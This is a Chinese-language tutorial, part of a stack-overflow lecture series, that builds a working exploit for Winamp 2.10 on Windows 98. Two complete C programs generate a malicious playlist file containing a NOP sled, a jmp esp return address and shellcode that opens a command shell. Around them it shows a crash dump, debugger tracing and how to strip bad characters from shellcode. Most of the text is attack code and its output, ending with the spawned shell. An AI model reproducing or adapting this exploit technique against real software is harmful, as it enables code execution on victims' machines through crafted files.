| 堆栈溢出系列讲座(9)
window系统下的堆栈溢出----最后的完善
我们把前面写的测试程序稍加改动就是一个exploit程序:
exploit.cpp
------------------------------------------------------------------------
int main()
{
char buffer[640];
char eip[8] = "\xa3\x95\xf7\xBF";
char shellcode[256] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"//load
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x4
5\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x50\x77\xF7\xbF\x52\x8
D\x45\xF4\x50" "\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x6
4\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x4
5\xF4"
"\x50\xB8\x24\x98\x01\x78\xFF\xD0"
"\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x5
0\xFF\x55\xFC";
FILE *file;
for(int x=0;x<580;x++)
{
buffer[x] = 0x90;
}
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", shellcode);
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
------------------------------------------------------------------------
OK,运行他,生成一个文件叫做crash.pls.在winamp里面打开这个playlist,
就应该出一个dos。出来了吗?
哎呀,怎么又是错误?
WINAMP 在 017f:004200c3 的模块
WINAMP.EXE 中导致无效页错误。
Registers:
EAX=00000001 CS=017f EIP=004200c3 EFLGS=00000206
EBX=006da30c SS=0187 ESP=006da171 EBP=006da2f4
ECX=00000000 DS=0187 ESI=00445638 FS=444f
EDX=005b02dc ES=0187 EDI=00000001 GS=4446
Bytes at CS:EIP:
00 85 f6 7d 06 03 35 dc 23 44 00 8b 6c 24 10 3b
Stack dump:
0a006da1 8000009d 0000442a 90000000 90909090 90909090
90909090 90909090 90909090 90909090 90909090 90909090
90909090 90909090 90909090 90909090
看看出错信息,EIP是4200c3,看来已经开始执行我们的shellcode了,怎么会有
无效页错误呢?看来我们的shellcode有问题。
这个时候,s-ice就又派上用场了,跟踪一下看看:
ctrl-d
bpx bff795a3(就是我们的jmp esp)
x
好,现在运行winamp,打开文件crash.pls,被s-ice拦下,开始跟踪。一个jmp esp
之后,就到了我们的shellcode上,继续执行,看到了什么吗?
奇怪!我们的shellcode变短了,到B8249801,后面就没有了。这是怎么回事?
应该是\xB8\x24\x98\x01\x78呀,\x01到什么地方去了?
看来敌人把输入的溢出字符串作乐处理,把不能作为文件名的字符都作为0处理了
(事实上这是win32api函数作的处理)。我们的shellcode被截断了。
我在第4讲第一节就说过对这种问题的对策。这个问题的解决需要我们改换
shellcode,
去掉那些有问题的字符:\x01
我们作如下替换:
mov eax,78019824----> mov eax,ffffffff
sub eax,87fe67db
汇编得到:
xB8\x24\x98\x01\x78 ----> \xB8\xFF\xFF\xFF\xFF
\x2d\xdB\x67\xFe\x87
得到下面的新程序:
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
* modify by ipxodi 20-01-2k
* for windows98 the 2nd version and for a new shellcode.
* windows98 v 4.10.2222.A chinese version
* pII 366 with 64MB RAM(Not a good PC,en?)
* ipxodi@263.net
*/
int main()
{
char buffer[640];
char eip[8] ="\xa3\x95\xf7\xbf";
char sploit[256] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x4
5\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x50\x77\xF7\xbF\x52\x8
D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x6
4\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x4
5\xF4"
"\x50\xB8\xFF\xFF\xFF\xFF\x2d\xdB\x67\xFe\x87\xFF\xD0"
"\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x5
0\xFF\x55\xFC";
FILE *file;
for(int x=0;x<580;x++)
{
buffer[x] = 0x90;
}
buffer[x]=0;
file = fopen("crAsh.pls","wb");
fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=1");
fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}
OK,运行他,生成一个文件叫做crash.pls.在winamp里面打开这个playlist,
结果如下,我可爱的dos出来了:
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.
D:\hacker\document\ipxodi>dir
.........................
........就不贴了.........
|
